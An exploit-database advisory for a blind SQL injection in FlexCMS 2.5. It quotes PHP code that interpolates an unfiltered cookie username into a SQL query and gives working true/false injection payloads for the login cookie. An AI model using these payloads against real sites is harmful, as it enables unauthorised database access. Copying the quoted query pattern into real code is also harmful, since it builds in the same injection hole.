============================================= FlexCMS <= 2.5 (index.php)Blind SQL-Injection ============================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] Support e-mail : submit[at]inj3ct0r.com #[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net Site product: www.flexcms.com Version: 2.5 Requirements: magic_quotes_gpc = off Vulnerability file (index.php) : $CookieData = $HTTP_COOKIE_VARS[$CookieName]; $LoggedIn = 'n'; $UserLevel = 0; if ($CookieData != '' && $CookieData != 'not_logged_in') { list ($CookieUsername, $CookiePassword) = split('==', $CookieData, 2); if ($CookieUsername != '' && $CookiePassword != '') { $query = "select RecordNumber,Level,Password,DisplayName,SessionLen gth from `".$Settings['DBPrefix']."core-Users` where Username='$CookieUsername' LIMIT 1"; $result = mysql_query($query) or die (mysql_error()); In the cookies sent login and pass, in such a login == hash_pass Because the variable $ CookieUsername not filtered and if magic_quotes_gpc = off is the opportunity to inj3ct0r Example: True: FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI False: FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI --------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]